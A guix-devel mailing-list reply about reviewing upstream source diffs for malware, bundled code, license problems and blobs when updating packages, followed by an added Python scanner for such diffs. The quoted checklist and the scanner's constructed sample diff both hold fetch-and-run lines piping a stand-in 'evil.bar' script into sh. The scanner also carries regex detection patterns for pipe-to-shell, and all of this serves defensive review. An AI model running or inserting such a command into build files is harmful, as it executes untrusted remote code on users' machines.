References: <0035734f12073a2f50d41641f66dacc35e2e6a2c.camel@telenet.be> <87y20ogqjl.fsf@kolabnow.com> <524c815e2d10f4012eb5f0192755b76b2297af6b.camel@telenet.be>
From: Thiago Jung Bauermann
To: Maxime Devos
Cc: guix-devel@gnu.org
Subject: Re: Reviewing the diff when updating a package?
Date: Sat, 02 Apr 2022 18:48:10 -0300
In-reply-to: <524c815e2d10f4012eb5f0192755b76b2297af6b.camel@telenet.be>
Message-ID: <87lewn87du.fsf@kolabnow.com>
List-Id: "Development of GNU Guix and the GNU System distribution."
Hello Maxime,

Thank you for such a detailed answer to my question. I appreciate it.

Maxime Devos writes:

> Thiago Jung Bauermann wrote on Fri 01-04-2022 at 22:59 [-0300]:
>> Hello Maxime,
>>
>> Maxime Devos writes:
>>
>> > Patch is not yet ready (I'm looking at the source code diff for
>> > anything ‘suspicious’), just reserving a bug number and avoiding double
>> > work. Will send an actual patch later.
>>
>> I hope you don't mind me asking what you mean by ‘suspicious’?
>>
>> Is it reviewing the code for security concerns?
>
> That (to a limited degree), and other things.
>
>> I ask because I've wondered sometimes whether contributors updating a
>> package to a new version should review the new source code.
>
> I don't think it's feasible for, say, large things like GCC and Linux.
> But for smaller things with smaller diffs, say a hypothetical
> npm-event-stream package, it would easily avoid things like the compromise
> described in .
>
> While we cannot feasibly protect users against more ‘hidden’ malware
> (e.g. some non-obvious remote code execution in C that then will be
> exploited by the upstream authors), the more obvious ‘here's a blob you
> don't need to look at’ seems detectable. I think ‘no malware (AFAWCT)’
> is an important property of a distribution.

Indeed. That's a very sensible approach. Just because we can't hope to
detect all malicious changes doesn't mean we can't attempt to catch the
more obvious malicious changes which, as your example shows, are actually
found in the wild.

> I look for the following things:
>
> 1. additional bundled software
> 2. code with a different license than mentioned in the 'license'
>    field (especially if it's proprietary)
> 3. ‘obvious’ malware like: curl https://evil.bar | sh - in a
> 4. blobs (possibly hiding malware)
> 5. things that look like bugs (e.g. not checking the return value of
>    'malloc' for NULL, not escaping things written to HTML documents
>    ...)
>
> I think I can reliably detect (1,3,4). I sometimes detect (5) but not
> detecting (5) (*) doesn't mean there are no bugs, I just quickly scroll
> through the code and don't do any detailed analysis
>
> (*) more specifically, some code not checking for NULL and an URL being
> embedded in the 'href' attribute of an XML element without escaping.

Wow, that's very thorough. Thank you for all this care with package
updates. This is very useful guidance when creating/reviewing patches that
update packages.

I'll take a stab at adding this information to the “Submitting Patches”
section of the manual.

-- 
Thanks
Thiago
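As an added illustration, not code from this thread or from Guix itself: a small scanner that applies the items Maxime lists as reliably detectable (bundled software, a new license text, curl-to-shell, blobs) to a git-style unified diff between two source versions. The regexes, the vendored-directory names and the sample diff are my assumptions, constructed for the example.

```python
import re
# Heuristics for the checklist items described above as reliably detectable:
# (1) newly bundled software, (2) a new license text, (3) 'curl ... | sh', (4) blobs.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")
BUNDLED_DIR = re.compile(r"^(vendor|third_party|thirdparty|deps|node_modules)/")
LICENSE_FILE = re.compile(r"(^|/)(LICEN[CS]E|COPYING)(\..*)?$", re.IGNORECASE)
OPAQUE_RUN = re.compile(r"[A-Za-z0-9+/=]{120,}")  # base64-ish data hidden in a text file

def scan_diff(diff_text: str) -> list[tuple[str, str, str]]:
    """Walk a git-style unified diff; return (category, path, detail) findings."""
    findings = []
    path = "?"
    for line in diff_text.splitlines():
        if line.startswith("diff --git "):
            path = line.split()[-1][2:]  # 'b/<path>' -> '<path>'
            if BUNDLED_DIR.search(path):
                findings.append(("bundled", path, "file under a vendored directory"))
        elif line.startswith("new file mode") and LICENSE_FILE.search(path):
            findings.append(("license", path, "new license text; compare with 'license' field"))
        elif line.startswith(("Binary files ", "GIT binary patch")):
            findings.append(("blob", path, line))
        elif line.startswith("+") and not line.startswith("+++"):
            added = line[1:].strip()
            if PIPE_TO_SHELL.search(added):
                findings.append(("pipe-to-shell", path, added))
            elif (m := OPAQUE_RUN.search(added)):
                findings.append(("blob", path, f"{len(m.group())}-char opaque run in a text file"))
    return findings

# Constructed sample diff (not from any real package) that trips every rule once.
OPAQUE_LINE = '+var payload = "' + "Zm9vYmFy" * 20 + '";'
SAMPLE_DIFF = f"""\
diff --git a/Makefile b/Makefile
@@ -1,2 +1,3 @@
 all:
+\tcurl -sSL https://evil.bar/setup.sh | sh -
 \t$(CC) -o prog main.c
diff --git a/vendor/helperlib/LICENSE b/vendor/helperlib/LICENSE
new file mode 100644
@@ -0,0 +1 @@
+All rights reserved. Redistribution prohibited.
diff --git a/src/util.js b/src/util.js
@@ -1 +1,2 @@
 "use strict";
{OPAQUE_LINE}
diff --git a/build/helper.so b/build/helper.so
new file mode 100644
Binary files /dev/null and b/build/helper.so differ
"""
```

Feed it the output of `git diff --no-index old-src/ new-src/` to get a starting list for the manual read; an empty result only means these particular patterns are absent, not that the update is clean.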